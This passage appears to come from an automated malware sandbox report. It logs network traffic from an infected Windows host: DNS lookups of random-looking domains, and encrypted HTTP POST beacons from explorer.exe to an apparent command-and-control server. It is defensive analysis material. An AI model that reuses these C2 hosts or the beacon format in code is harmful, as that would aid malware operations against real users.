Apr 4, 2024 17:49:52.102894068 CEST	49818	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:52.103229046 CEST	49818	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:52.103246927 CEST	443	49818	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:52.641560078 CEST	443	49818	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:52.644167900 CEST	49818	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:52.645011902 CEST	49818	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:52.645024061 CEST	443	49818	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:52.645348072 CEST	49818	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:52.645354033 CEST	443	49818	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:53.595426083 CEST	443	49818	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:53.595503092 CEST	443	49818	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:53.595504045 CEST	49818	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:53.595566034 CEST	49818	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:53.595765114 CEST	49818	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:53.595783949 CEST	443	49818	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:53.597256899 CEST	49819	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:53.597296000 CEST	443	49819	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:53.597379923 CEST	49819	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:53.597641945 CEST	49819	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:53.597657919 CEST	443	49819	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:54.133424044 CEST	443	49819	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:54.133497000 CEST	49819	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:54.133963108 CEST	49819	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:54.133971930 CEST	443	49819	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:54.134143114 CEST	49819	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:54.134150982 CEST	443	49819	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:55.077369928 CEST	443	49819	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:55.077442884 CEST	49819	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:55.077447891 CEST	443	49819	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:55.077497959 CEST	49819	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:55.077646971 CEST	49819	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:55.077672958 CEST	443	49819	95.216.179.73	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2024 17:48:47.691992998 CEST	51892	53	192.168.2.10	1.1.1.1
Apr 4, 2024 17:48:48.634629011 CEST	53	51892	1.1.1.1	192.168.2.10
Apr 4, 2024 17:48:53.468358994 CEST	52962	53	192.168.2.10	1.1.1.1
Apr 4, 2024 17:48:53.648089886 CEST	53	52962	1.1.1.1	192.168.2.10
Apr 4, 2024 17:48:58.923017979 CEST	53646	53	192.168.2.10	1.1.1.1
Apr 4, 2024 17:48:59.050424099 CEST	53	53646	1.1.1.1	192.168.2.10
Apr 4, 2024 17:49:02.083509922 CEST	56943	53	192.168.2.10	1.1.1.1
Apr 4, 2024 17:49:03.082865953 CEST	56943	53	192.168.2.10	1.1.1.1
Apr 4, 2024 17:49:03.548211098 CEST	53	56943	1.1.1.1	192.168.2.10
Apr 4, 2024 17:49:03.548234940 CEST	53	56943	1.1.1.1	192.168.2.10
Apr 4, 2024 17:49:03.714509010 CEST	54899	53	192.168.2.10	1.1.1.1
Apr 4, 2024 17:49:04.705823898 CEST	54899	53	192.168.2.10	1.1.1.1
Apr 4, 2024 17:49:05.721481085 CEST	54899	53	192.168.2.10	1.1.1.1
Apr 4, 2024 17:49:06.154328108 CEST	53	54899	1.1.1.1	192.168.2.10
Apr 4, 2024 17:49:06.154413939 CEST	53	54899	1.1.1.1	192.168.2.10
Apr 4, 2024 17:49:06.154527903 CEST	53	54899	1.1.1.1	192.168.2.10
Apr 4, 2024 17:49:06.745994091 CEST	57393	53	192.168.2.10	1.1.1.1
Apr 4, 2024 17:49:06.872071028 CEST	53	57393	1.1.1.1	192.168.2.10
Apr 4, 2024 17:49:10.536596060 CEST	60115	53	192.168.2.10	1.1.1.1
Apr 4, 2024 17:49:10.668093920 CEST	53	60115	1.1.1.1	192.168.2.10
Apr 4, 2024 17:49:15.159982920 CEST	55435	53	192.168.2.10	1.1.1.1
Apr 4, 2024 17:49:15.365483046 CEST	53	55435	1.1.1.1	192.168.2.10
Apr 4, 2024 17:49:18.421955109 CEST	62958	53	192.168.2.10	1.1.1.1
Apr 4, 2024 17:49:18.547022104 CEST	53	62958	1.1.1.1	192.168.2.10
Apr 4, 2024 17:49:22.941132069 CEST	55924	53	192.168.2.10	1.1.1.1
Apr 4, 2024 17:49:23.065983057 CEST	53	55924	1.1.1.1	192.168.2.10
Apr 4, 2024 17:49:29.021025896 CEST	49154	53	192.168.2.10	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 4, 2024 17:48:47.691992998 CEST	192.168.2.10	1.1.1.1	0x53cc	Standard query (0)	trad-einmyus.com	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:48:53.468358994 CEST	192.168.2.10	1.1.1.1	0xdff1	Standard query (0)	sdfjhuz.com	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:48:58.923017979 CEST	192.168.2.10	1.1.1.1	0x3454	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:02.083509922 CEST	192.168.2.10	1.1.1.1	0xaf11	Standard query (0)	m2reg.ulm.ac.id	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:03.082865953 CEST	192.168.2.10	1.1.1.1	0xaf11	Standard query (0)	m2reg.ulm.ac.id	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:03.714509010 CEST	192.168.2.10	1.1.1.1	0xd3fb	Standard query (0)	sajdfue.com	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:04.705823898 CEST	192.168.2.10	1.1.1.1	0xd3fb	Standard query (0)	sajdfue.com	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:05.721481085 CEST	192.168.2.10	1.1.1.1	0xd3fb	Standard query (0)	sajdfue.com	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.745994091 CEST	192.168.2.10	1.1.1.1	0x7061	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:10.536596060 CEST	192.168.2.10	1.1.1.1	0x6f8	Standard query (0)	resergvearyinitiani.shop	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:15.159982920 CEST	192.168.2.10	1.1.1.1	0x8a35	Standard query (0)	nessotechbd.com	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:18.421955109 CEST	192.168.2.10	1.1.1.1	0xd061	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:22.941132069 CEST	192.168.2.10	1.1.1.1	0x2a3e	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:29.021025896 CEST	192.168.2.10	1.1.1.1	0xf1f8	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 4, 2024 17:48:48.634629011 CEST	1.1.1.1	192.168.2.10	0x53cc	No error (0)	trad-einmyus.com		193.106.175.76	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:48:53.648089886 CEST	1.1.1.1	192.168.2.10	0xdff1	No error (0)	sdfjhuz.com		190.249.187.165	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:48:53.648089886 CEST	1.1.1.1	192.168.2.10	0xdff1	No error (0)	sdfjhuz.com		190.28.105.191	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:48:53.648089886 CEST	1.1.1.1	192.168.2.10	0xdff1	No error (0)	sdfjhuz.com		190.195.60.212	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:48:53.648089886 CEST	1.1.1.1	192.168.2.10	0xdff1	No error (0)	sdfjhuz.com		190.220.21.28	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:48:53.648089886 CEST	1.1.1.1	192.168.2.10	0xdff1	No error (0)	sdfjhuz.com		189.134.97.255	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:48:53.648089886 CEST	1.1.1.1	192.168.2.10	0xdff1	No error (0)	sdfjhuz.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:48:53.648089886 CEST	1.1.1.1	192.168.2.10	0xdff1	No error (0)	sdfjhuz.com		181.26.223.85	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:48:53.648089886 CEST	1.1.1.1	192.168.2.10	0xdff1	No error (0)	sdfjhuz.com		200.45.93.45	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:48:53.648089886 CEST	1.1.1.1	192.168.2.10	0xdff1	No error (0)	sdfjhuz.com		148.230.249.9	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:48:53.648089886 CEST	1.1.1.1	192.168.2.10	0xdff1	No error (0)	sdfjhuz.com		189.181.34.192	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:48:59.050424099 CEST	1.1.1.1	192.168.2.10	0x3454	No error (0)	api.2ip.ua		104.21.65.24	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:48:59.050424099 CEST	1.1.1.1	192.168.2.10	0x3454	No error (0)	api.2ip.ua		172.67.139.220	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:03.548211098 CEST	1.1.1.1	192.168.2.10	0xaf11	No error (0)	m2reg.ulm.ac.id		103.23.232.80	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:03.548234940 CEST	1.1.1.1	192.168.2.10	0xaf11	No error (0)	m2reg.ulm.ac.id		103.23.232.80	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154328108 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		189.195.132.134	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154328108 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		179.27.75.59	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154328108 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		125.7.253.10	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154328108 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		190.98.23.157	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154328108 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		63.143.98.185	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154328108 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		195.158.3.162	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154328108 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		189.245.27.132	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154328108 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		189.232.22.59	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154328108 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		189.163.65.73	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154328108 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		187.156.64.107	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154413939 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		189.195.132.134	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154413939 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		179.27.75.59	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154413939 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		125.7.253.10	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154413939 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		190.98.23.157	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154413939 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		63.143.98.185	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154413939 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		195.158.3.162	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154413939 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		189.245.27.132	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154413939 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		189.232.22.59	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154413939 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		189.163.65.73	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154413939 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		187.156.64.107	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154527903 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		189.195.132.134	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154527903 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		179.27.75.59	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154527903 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		125.7.253.10	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154527903 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		190.98.23.157	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154527903 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		63.143.98.185	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154527903 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		195.158.3.162	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154527903 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		189.245.27.132	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154527903 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		189.232.22.59	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154527903 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		189.163.65.73	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.154527903 CEST	1.1.1.1	192.168.2.10	0xd3fb	No error (0)	sajdfue.com		187.156.64.107	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:06.872071028 CEST	1.1.1.1	192.168.2.10	0x7061	No error (0)	steamcommunity.com		23.47.27.74	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:10.668093920 CEST	1.1.1.1	192.168.2.10	0x6f8	No error (0)	resergvearyinitiani.shop		172.67.217.100	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:10.668093920 CEST	1.1.1.1	192.168.2.10	0x6f8	No error (0)	resergvearyinitiani.shop		104.21.94.2	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:15.365483046 CEST	1.1.1.1	192.168.2.10	0x8a35	No error (0)	nessotechbd.com		192.185.16.114	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:18.547022104 CEST	1.1.1.1	192.168.2.10	0xd061	No error (0)	drive.google.com		142.250.217.238	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:23.065983057 CEST	1.1.1.1	192.168.2.10	0x2a3e	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:23.065983057 CEST	1.1.1.1	192.168.2.10	0x2a3e	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:23.065983057 CEST	1.1.1.1	192.168.2.10	0x2a3e	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:23.065983057 CEST	1.1.1.1	192.168.2.10	0x2a3e	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:23.065983057 CEST	1.1.1.1	192.168.2.10	0x2a3e	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)	false
Apr 4, 2024 17:49:29.145287991 CEST	1.1.1.1	192.168.2.10	0xf1f8	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

api.2ip.ua

steamcommunity.com

95.216.179.73

resergvearyinitiani.shop

nessotechbd.com

drive.google.com

cdn.discordapp.com

cxltnyhuiiffpv.net

trad-einmyus.com

wnghboslcyptbv.net

ybixnwfxqnawnke.org

nveksqhtkfjprim.com

iaviihjfvlkssdeo.com

jshvqxnxlgx.com

qxjqslomabchbuh.org

wihgequinwr.net

sdfjhuz.com

cuefhssjycse.com

wdoppvcdtixmex.com

gsjmasrkkjrldiqo.net

srlstapgnwbh.com

aygrwtlyeqtqcv.org

vottapluwptwea.com

qpiqwcfhkuvh.net

bvudrrycsbfpyj.com

ugqjwtqplqxf.net

m2reg.ulm.ac.id

sajdfue.com

ehdswwmhlqrs.org

jdodcmixlyen.net

qcnlqwjswwevflg.org

ykjudvyllkuyg.net

gyvrdnjxaaxg.com

regrmottymepxy.org

moryykdrlgvjg.com

sbihfurweaaj.org

klogjhrpharyvvyr.net

cjivmprmunnfue.org

qtdootfwibyptmfp.net

klmmidnilgd.net

rvqmjyfxgsww.org

xlmtuhrwkmvmisey.org

lmdwelfmosoqccq.com

yxnwgxcirurq.com

mphdyxrkiaplq.com

oenbmxunqihumux.net

lwhqeahmjeyw.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49709	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:48.921116114 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cxltnyhuiiffpv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 302 Host: trad-einmyus.com
Apr 4, 2024 17:48:48.921147108 CEST	302	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 4a 9a be 3a Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dJ:(}R;MG&W7z(v>TD<{g6'Eg0A&L'61PZ,GRj6#i4Ixp2:n*+\|=zz~rO#8N{D1_
Apr 4, 2024 17:48:49.265110970 CEST	190	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:48:49 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 38 0d 0a 04 00 00 00 79 fa f7 10 0d 0a 30 0d 0a 0d 0a Data Ascii: 8y0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49710	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:49.556279898 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wnghboslcyptbv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 123 Host: trad-einmyus.com
Apr 4, 2024 17:48:49.556298971 CEST	123	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9e 66 5d 02 c8 a1 c1 64 28 b6 87 7e Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d(~{bu\qM[\U4ak9G:$SI)
Apr 4, 2024 17:48:49.850984097 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:48:49 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49711	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:50.137339115 CEST	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ybixnwfxqnawnke.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 193 Host: trad-einmyus.com
Apr 4, 2024 17:48:50.137351036 CEST	193	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9f 66 5d 02 c8 a1 c1 64 44 c3 aa 04 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dDCoP],PP"AH,xr :4e<Q);B(Rb)M#C1\O=Mg5W5cyE_ 9q_`V
Apr 4, 2024 17:48:50.496069908 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:48:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49712	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:50.780975103 CEST	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nveksqhtkfjprim.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 163 Host: trad-einmyus.com
Apr 4, 2024 17:48:50.780996084 CEST	163	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9c 66 5d 02 c8 a1 c1 64 32 c2 cc 61 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d2a1VJ\|puZx1e}M# lFzA\Xg`X4()9II9Dv
Apr 4, 2024 17:48:51.077728987 CEST	262	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:48:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73\|"s2h3T'cSc"8iz`;?Dt0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49713	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:51.417166948 CEST	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iaviihjfvlkssdeo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 152 Host: trad-einmyus.com
Apr 4, 2024 17:48:51.417186022 CEST	152	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 9c 66 5d 02 c9 a1 c1 64 04 a6 b6 15 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d=jF[bbNZ;abrhJP3%`!~7`t+Y#>%
Apr 4, 2024 17:48:51.716804028 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:48:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 